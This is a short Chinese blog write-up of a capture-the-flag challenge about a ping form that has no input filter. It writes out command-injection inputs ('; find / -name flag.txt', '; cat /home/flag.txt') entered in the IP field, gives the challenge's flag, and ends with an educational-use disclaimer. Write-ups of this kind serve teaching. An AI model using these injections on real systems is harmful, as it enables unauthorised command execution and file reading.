command_execution
小宁写了个ping功能,但没有写waf,X老师告诉她这是非常危险的,你知道为什么吗。
解法
输入个ip试一下。原来是直接执行 ping 指令。
好好好,这不就能直接执行指令了么。先找找 flag 在哪里。
; find / -name flag.txt
找到了,在 /home/flag.txt。
让我看看 flag 是什么。
; cat /home/flag.txt
Flag
cyberpeace{180e93bc5f4612cc79c5eee525d6f43e}
声明
本博客上发布的所有关于网络攻防技术的文章,仅用于教育和研究目的。所有涉及到的实验操作都在虚拟机或者专门设计的靶机上进行,并且严格遵守了相关法律法规。
博主坚决反对任何形式的非法黑客行为,包括但不限于未经授权的访问、攻击或破坏他人的计算机系统。博主强烈建议每位读者在学习网络攻防技术时,必须遵守法律法规,不得用于任何非法目的。对于因使用这些技术而导致的任何后果,博主不承担任何责任。
